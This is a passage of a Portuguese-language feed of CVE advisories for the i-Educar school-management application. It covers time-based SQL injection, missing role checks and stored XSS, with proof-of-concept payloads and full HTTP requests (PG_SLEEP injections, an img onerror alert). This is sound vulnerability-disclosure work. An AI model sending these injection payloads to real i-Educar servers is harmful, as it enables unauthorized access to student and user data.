de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-9608-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleformulamediaview">CVE-2025-9608: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>/module/FormulaMedia/view</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9608" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9608</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>/module/FormulaMedia/view</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/module/FormulaMedia/view</code></p> <p>Parâmetro: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR </span></span></code></pre></td></tr></table> </div> </div><h4 id="exemplo-de-requisição">Exemplo de Requisição </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/FormulaMedia/view?id=1%27+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+%27WqeR%27=%27WqeR HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.</p> <p><img src="/p/cve-2025-9608/image.png" width="1127" height="1015" srcset="/p/cve-2025-9608/image_hu_2f4a07eb87effb6.png 480w, /p/cve-2025-9608/image_hu_4a2882fae48dd050.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="111" data-flex-basis="266px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 29 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9609/ https://www.cvehunters.com/pt/p/cve-2025-9609/ <h2 id="cve-2025-9609-controle-de-acesso-em-nível-de-função-ausente-no-endpoint-educacensoconsulta">CVE-2025-9609: Controle de acesso em nível de função ausente no endpoint <code>/educacenso/consulta</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9609" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9609</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/educacenso/consulta</code> do aplicativo i-Educar. Esse problema permite que usuários autenticados sem a função necessária acessem funcionalidades ou dados que deveriam ser restritos, resultando em elevação de privilégio e acesso não autorizado.</p> <h2 id="detalhes">Detalhes </h2><p><strong>Endpoint Vulnerável:</strong> <code>GET /educacenso/consulta</code></p> <p><strong>Autenticação:</strong> Obrigatória (mas verificações de autorização insuficientes)</p><h2 id="cve-2025-9609-controle-de-acesso-em-nível-de-função-ausente-no-endpoint-educacensoconsulta">CVE-2025-9609: Controle de acesso em nível de função ausente no endpoint <code>/educacenso/consulta</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9609" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9609</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/educacenso/consulta</code> do aplicativo i-Educar. Esse problema permite que usuários autenticados sem a função necessária acessem funcionalidades ou dados que deveriam ser restritos, resultando em elevação de privilégio e acesso não autorizado.</p> <h2 id="detalhes">Detalhes </h2><p><strong>Endpoint Vulnerável:</strong> <code>GET /educacenso/consulta</code></p> <p><strong>Autenticação:</strong> Obrigatória (mas verificações de autorização insuficientes)</p> <p><strong>Função necessária:</strong> Acesso somente ao aplicativo</p> <p><strong>Cenário afetado:</strong> Um usuário sem a função necessária ainda consegue acessar diretamente o endpoint.</p> <p style="text-align: justify;">O aplicativo não consegue aplicar o controle de acesso baseado em função (RBAC) adequado no endpoint <code>/educacenso/consulta</code>. Como resultado, usuários com níveis de privilégio mais baixos podem acessar dados e funcionalidades confidenciais que deveriam ser restritos a funções com privilégios mais altos.</p> <h2 id="poc">PoC </h2><p>Solicitação usando uma sessão de um usuário sem a função Educacenso:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /educacenso/consulta HTTP/1.1 Host: <span class="p"><</span><span class="nt">target</span><span class="p">></span> Cookie: PHPSESSID=<span class="p"><</span><span class="nt">low_privileged_session</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9609/image.png" width="1575" height="708" srcset="/p/cve-2025-9609/image_hu_342a2b269456c359.png 480w, /p/cve-2025-9609/image_hu_78d6f5df22994203.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="222" data-flex-basis="533px" /></p> <p><strong>Resultado observado:</strong> O servidor responde com HTTP 200 e retorna conteúdo restrito.</p> <p><strong>Resultado esperado:</strong> O servidor deve responder com HTTP 403 (Forbidden).</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais do censo educacional;</li> <li>Elevação de privilégio de um usuário básico para funções com acesso a módulos restritos;</li> <li>Possível manipulação de dados confidenciais se operações de gravação estiverem acessíveis;</li> <li>Violação da confidencialidade e integridade de informações protegidas;</li> <li>Violações de conformidade se dados pessoais confidenciais forem expostos a usuários não autorizados.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 29 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9652/ https://www.cvehunters.com/pt/p/cve-2025-9652/ <h2 id="cve-2025-9652-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_transferencia_tipo_cadphp">CVE-2025-9652: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_transferencia_tipo_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9652" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9652</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_transferencia_tipo_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_tipo</code> e <code>desc_tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_transferencia_tipo_cad.php</code></p><h2 id="cve-2025-9652-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_transferencia_tipo_cadphp">CVE-2025-9652: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_transferencia_tipo_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9652" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9652</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_transferencia_tipo_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_tipo</code> e <code>desc_tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_transferencia_tipo_cad.php</code></p> <p>Parâmetros:<code>nm_tipo</code> e <code>desc_tipo</code></p> <p>Outro Endpoint Afetado: <code>/intranet/educar_transferencia_tipo_det.php?cod_transferencia_tipo=[id]</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nm_tipo</code> e <code>desc_tipo</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9652/image.png" width="741" height="592" srcset="/p/cve-2025-9652/image_hu_c6ccac438811cb73.png 480w, /p/cve-2025-9652/image_hu_f23a6e3e10957c05.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="125" data-flex-basis="300px" /></p> <p><img src="/p/cve-2025-9652/image-1.png" width="738" height="341" srcset="/p/cve-2025-9652/image-1_hu_45b054bc4c59654b.png 480w, /p/cve-2025-9652/image-1_hu_4ed8f53b57d99036.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="216" data-flex-basis="519px" /></p> <p><img src="/p/cve-2025-9652/image-2.png" width="690" height="281" srcset="/p/cve-2025-9652/image-2_hu_c194e94dc6a4b0fd.png 480w, /p/cve-2025-9652/image-2_hu_8375d7eb45ee1d31.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="245" data-flex-basis="589px" /></p> <p><img src="/p/cve-2025-9652/image-3.png" width="661" height="317" srcset="/p/cve-2025-9652/image-3_hu_8eb960a4b7cdc869.png 480w, /p/cve-2025-9652/image-3_hu_439d0daf74e59258.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="208" data-flex-basis="500px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 29 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9653/ https://www.cvehunters.com/pt/p/cve-2025-9653/ <h2 id="cve-2025-9653-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_projeto_cadphp">CVE-2025-9653: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_projeto_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9653" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9653</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_projeto_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nome</code> e <code>desc_tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_projeto_cad.php</code></p><h2 id="cve-2025-9653-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_projeto_cadphp">CVE-2025-9653: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_projeto_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9653" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9653</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_projeto_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nome</code> e <code>desc_tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_projeto_cad.php</code></p> <p>Parâmetros:<code>nome</code> e <code>desc_tipo</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nome</code> e <code>desc_tipo</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9653/image.png" width="679" height="308" srcset="/p/cve-2025-9653/image_hu_ff92ad4a0e5a10c8.png 480w, /p/cve-2025-9653/image_hu_874ab00290986bd0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="220" data-flex-basis="529px" /></p> <p><img src="/p/cve-2025-9653/image-1.png" width="649" height="281" srcset="/p/cve-2025-9653/image-1_hu_767cf2003758e659.png 480w, /p/cve-2025-9653/image-1_hu_3ac528eecbe71f7b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="230" data-flex-basis="554px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9653.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9653.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 29 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9531/ https://www.cvehunters.com/pt/p/cve-2025-9531/ <h2 id="cve-2025-9531-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-cod_agenda-do-endpoint-agendaphp">CVE-2025-9531: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>cod_agenda</code> do Endpoint <code>agenda.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9531" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9531</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>cod_agenda</code> do endpoint <code>agenda.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>cod_agenda</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-9531-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-cod_agenda-do-endpoint-agendaphp">CVE-2025-9531: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>cod_agenda</code> do Endpoint <code>agenda.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9531" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9531</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>cod_agenda</code> do endpoint <code>agenda.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>cod_agenda</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>agenda.php</code></p> <p>Parâmetro: <code>cod_agenda</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">' AND 4698=(SELECT 4698 FROM PG_SLEEP(5)) AND 'xiCO'='xiCO </span></span></code></pre></td></tr></table> </div> </div><h4 id="exemplo-de-requisição">Exemplo de Requisição </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /intranet/agenda.php?cod_agenda=2%27%20AND%204698=(SELECT%204698%20FROM%20PG_SLEEP(5))%20AND%20%27xiCO%27=%27xiCO HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost:8086 </span></span><span class="line"><span class="cl">sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138" </span></span><span class="line"><span class="cl">sec-ch-ua-mobile: ?0 </span></span><span class="line"><span class="cl">sec-ch-ua-platform: "Linux" </span></span><span class="line"><span class="cl">Accept-Language: pt-BR,pt;q=0.9 </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Cookie: i_educar_session=5AfYtvGRiuEgLBVbvksmwiNSnG75l4waXNMo1PEV </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.</p> <h3 id="requisição-normal">Requisição normal: </h3><p><img src="/p/cve-2025-9531/image.png" width="755" height="463" srcset="/p/cve-2025-9531/image_hu_ad6bd9751fe854f9.png 480w, /p/cve-2025-9531/image_hu_c861952455d3f9c2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="163" data-flex-basis="391px" /></p> <h3 id="requisição-modificada">Requisição modificada: </h3><p><img src="/p/cve-2025-9531/image-1.png" width="749" height="471" srcset="/p/cve-2025-9531/image-1_hu_d6a9f2422248cbd0.png 480w, /p/cve-2025-9531/image-1_hu_8485356e4f83ee41.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="159" data-flex-basis="381px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9531.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9531.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 27 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9532/ https://www.cvehunters.com/pt/p/cve-2025-9532/ <h2 id="cve-2025-9532-vulnerabilidade-de-injeção-sql-boolean-based-no-parâmetro-id-do-endpoint-regraavaliacaoviewidid">CVE-2025-9532: Vulnerabilidade de Injeção SQL (Boolean-Based) no parâmetro <code>id</code> do Endpoint <code>RegraAvaliacao/view?id=[id]</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9532" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9532</a></em></p> </blockquote> <h2 id="resumo">Resumo 